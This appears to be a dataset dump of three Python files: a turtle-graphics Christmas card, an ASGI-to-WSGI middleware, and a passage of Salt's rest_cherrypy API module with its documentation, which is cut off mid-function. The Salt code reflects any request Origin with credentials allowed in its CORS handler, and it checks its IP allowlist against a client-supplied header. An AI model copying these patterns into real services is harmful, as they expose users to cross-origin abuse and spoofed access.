source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
run.py
|
import time
import playsound
from turtle import *
from random import randint
from threading import Thread
def play_bg_music():
playsound.playsound("system-files//bg-sound.mp3")
def finish_music():
playsound.playsound("system-files//finish-sound.mp3")
thread1 = Thread(target = play_bg_music)
thread1.start()
time.sleep(2)
def create_rectangle(turtle, color, x, y, width, height):
turtle.penup()
turtle.color(color)
turtle.fillcolor(color)
turtle.goto(x, y)
turtle.pendown()
turtle.begin_fill()
turtle.forward(width)
turtle.left(90)
turtle.forward(height)
turtle.left(90)
turtle.forward(width)
turtle.left(90)
turtle.forward(height)
turtle.left(90)
# fill the above shape
turtle.end_fill()
# Reset the orientation of the turtle
turtle.setheading(0)
def create_circle(turtle, x, y, radius, color):
turtle_pen.penup()
turtle_pen.color(color)
turtle_pen.fillcolor(color)
turtle_pen.goto(x, y)
turtle_pen.pendown()
turtle_pen.begin_fill()
turtle_pen.circle(radius)
turtle_pen.end_fill()
BG_COLOR = "#000000"
turtle_pen = Turtle() # Create turtle object
turtle_pen.speed(10) # Define turtle speed
screen = turtle_pen.getscreen() # Define background-color
screen.bgcolor(BG_COLOR)
screen.title("Merry Christmas") # Wishing quotes
screen.setup(width=1.0, height=1.0) # Set up screen.
y = 0
# Draw tree
width = 340
turtle_pen.speed(50)
while width > 10:
width = width - 10
height = 10
x = 0 - width/2
create_rectangle(turtle_pen, "green", x, y, width, height)
y = y + height
# Draw a stars
turtle_pen.speed(5)
turtle_pen.penup()
turtle_pen.color('red')
turtle_pen.goto(-20, y+10)
turtle_pen.begin_fill()
turtle_pen.pendown()
for i in range(5):
turtle_pen.forward(40)
turtle_pen.right(144)
turtle_pen.end_fill()
y = -100
create_rectangle(turtle_pen, "brown", -15, y-60, 30, 60) # Draw tree trunk
# Draw tree
width = 340
turtle_pen.speed(50)
while width > 5:
width = width - 10
height = 10
x = 0 - width/2
create_rectangle(turtle_pen, "green", x, y, width, height)
y = y + height
tree_height = y + 40
# Draw yellow color moon
create_circle(turtle_pen, 230, 180, 60, "yellow")
# Slice the full circle to make a crescent desgin
create_circle(turtle_pen, 220, 180, 60, BG_COLOR)
# Draw stars on black background.
turtle_pen.speed(300)
number_of_stars = randint(50,60)
# print(number_of_stars)
for _ in range(0,number_of_stars):
x_star = randint(-(screen.window_width()//2),screen.window_width()//2)
y_star = randint(tree_height, screen.window_height()//2)
size = randint(5,20)
turtle_pen.penup()
turtle_pen.color('white')
turtle_pen.goto(x_star, y_star)
turtle_pen.begin_fill()
turtle_pen.pendown()
for i in range(5):
turtle_pen.forward(size)
turtle_pen.right(144)
turtle_pen.end_fill()
# print greeting message
turtle_pen.speed(5)
turtle_pen.penup()
msg = "Wishing You A Very Merry Christmas ~ Gunarakulan Gunaretnam"
turtle_pen.goto(0, -200) # y is in minus because tree trunk was below x axis
turtle_pen.color("orange")
turtle_pen.pendown()
turtle_pen.write(msg, move=False, align="center", font=("Arial", 25, "bold"))
finish_music()
turtle_pen.hideturtle()
screen.mainloop()
|
asgi.py
|
import asyncio
import collections
import threading
from http import HTTPStatus
from itertools import chain
from typing import Any, Deque, Iterable
from .types import ASGIApp, Environ, Message, Scope, StartResponse
__all__ = ("ASGIMiddleware",)
class AsyncEvent:
def __init__(self, loop: asyncio.AbstractEventLoop) -> None:
self.loop = loop
self.__waiters: Deque[asyncio.Future] = collections.deque()
self.__nowait = False
def _set(self, message: Any) -> None:
for future in filter(lambda f: not f.done(), self.__waiters):
future.set_result(message)
def set(self, message: Any) -> None:
self.loop.call_soon_threadsafe(self._set, message)
async def wait(self) -> Any:
if self.__nowait:
return None
future = self.loop.create_future()
self.__waiters.append(future)
try:
result = await future
return result
finally:
self.__waiters.remove(future)
def set_nowait(self) -> None:
self.__nowait = True
class SyncEvent:
def __init__(self) -> None:
self.__write_event = threading.Event()
self.__message: Any = None
def set(self, message: Any) -> None:
self.__message = message
self.__write_event.set()
def wait(self) -> Any:
self.__write_event.wait()
self.__write_event.clear()
message, self.__message = self.__message, None
return message
def build_scope(environ: Environ) -> Scope:
headers = [
(key.lower().replace("_", "-").encode("latin-1"), value.encode("latin-1"))
for key, value in chain(
(
(key[5:], value)
for key, value in environ.items()
if key.startswith("HTTP_")
),
(
(key, value)
for key, value in environ.items()
if key in ("CONTENT_TYPE", "CONTENT_LENGTH")
),
)
]
if environ.get("REMOTE_ADDR") and environ.get("REMOTE_PORT"):
client = (environ["REMOTE_ADDR"], int(environ["REMOTE_PORT"]))
else:
client = None
return {
"wsgi_environ": environ,
"type": "http",
"asgi": {"version": "3.0", "spec_version": "3.0"},
"http_version": environ.get("SERVER_PROTOCOL", "http/1.0").split("/")[1],
"method": environ["REQUEST_METHOD"],
"scheme": environ.get("wsgi.url_scheme", "http"),
"path": environ["PATH_INFO"].encode("latin1").decode("utf8"),
"query_string": environ["QUERY_STRING"].encode("ascii"),
"root_path": environ.get("SCRIPT_NAME", "").encode("latin1").decode("utf8"),
"client": client,
"server": (environ["SERVER_NAME"], int(environ["SERVER_PORT"])),
"headers": headers,
}
class ASGIMiddleware:
"""
Convert ASGIApp to WSGIApp.
wait_time: After the http response ends, the maximum time to wait for the ASGI app to run.
"""
def __init__(
self,
app: ASGIApp,
wait_time: float = None,
loop: asyncio.AbstractEventLoop = None,
) -> None:
self.app = app
if loop is None:
loop = asyncio.new_event_loop()
loop_threading = threading.Thread(target=loop.run_forever, daemon=True)
loop_threading.start()
self.loop = loop
self.wait_time = wait_time
def __call__(
self, environ: Environ, start_response: StartResponse
) -> Iterable[bytes]:
return ASGIResponder(self.loop, self.app, wait_time=self.wait_time)(
environ, start_response
)
class ASGIResponder:
def __init__(
self, loop: asyncio.AbstractEventLoop, app: ASGIApp, wait_time: float = None
) -> None:
self.loop = loop
self.app = app
self.wait_time = wait_time
self.sync_event = SyncEvent()
self.async_event = AsyncEvent(loop)
loop.call_soon_threadsafe(self._init_asgi_lock)
def _init_asgi_lock(self) -> None:
self.async_lock = asyncio.Lock()
def __call__(
self, environ: Environ, start_response: StartResponse
) -> Iterable[bytes]:
asgi_done = threading.Event()
wsgi_should_stop = False
def _done_callback(future: asyncio.Future) -> None:
if future.exception() is not None:
e: BaseException = future.exception() # type: ignore
self.sync_event.set(
{"type": "error", "exception": (type(e), e, e.__traceback__)}
)
asgi_done.set()
run_asgi: asyncio.Task = self.loop.create_task(
self.app(build_scope(environ), self.asgi_receive, self.asgi_send)
)
run_asgi.add_done_callback(_done_callback)
read_count, body = 0, environ["wsgi.input"]
content_length = int(environ.get("CONTENT_LENGTH", None) or 0)
self.loop.call_soon_threadsafe(lambda: None)
while not wsgi_should_stop:
message = self.sync_event.wait()
message_type = message["type"]
if message_type == "http.response.start":
status = message["status"]
headers = [
(
name.strip().decode("latin1"),
value.strip().decode("latin1"),
)
for name, value in message["headers"]
]
start_response(f"{status} {HTTPStatus(status).phrase}", headers, None)
elif message_type == "http.response.body":
yield message.get("body", b"")
wsgi_should_stop = not message.get("more_body", False)
elif message_type == "http.response.disconnect":
wsgi_should_stop = True
elif message_type == "error":
start_response(
f"{500} {HTTPStatus(500).phrase}",
[
("Content-Type", "text/plain; charset=utf-8"),
("Content-Length", str(len(HTTPStatus(500).description))),
],
message["exception"],
)
yield str(HTTPStatus(500).description).encode("utf-8")
wsgi_should_stop = True
if message_type == "receive":
data = body.read(min(4096, content_length - read_count))
read_count += len(data)
self.async_event.set(
{
"type": "http.request",
"body": data,
"more_body": read_count < content_length,
}
)
else:
self.async_event.set(None)
if wsgi_should_stop:
self.async_event.set_nowait()
if run_asgi.done():
break
# HTTP response ends, wait for run_asgi's background tasks
asgi_done.wait(self.wait_time)
run_asgi.cancel()
yield b""
async def asgi_receive(self) -> Message:
async with self.async_lock:
self.sync_event.set({"type": "receive"})
return await self.async_event.wait()
async def asgi_send(self, message: Message) -> None:
async with self.async_lock:
self.sync_event.set(message)
await self.async_event.wait()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms, and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed. '
'Possible upstream bug: '
'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed.')
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
from salt.ext import six
from salt.ext.six import BytesIO
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user %s from IP %s")
success_str = ("[api_acl] Authentication sucessful for "
"user %s from IP %s")
pass_str = ("[api_acl] Authentication not checked for "
"user %s from IP %s")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(pass_str, username, ip)
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug('Found IP list: %s', auth_ip_list)
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug('Request from IP: %s', rem_ip)
if rem_ip not in auth_ip_list:
logger.error('Blocked IP: %s', rem_ip)
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', salt.utils.json.dumps),
('application/x-yaml', functools.partial(
salt.utils.yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
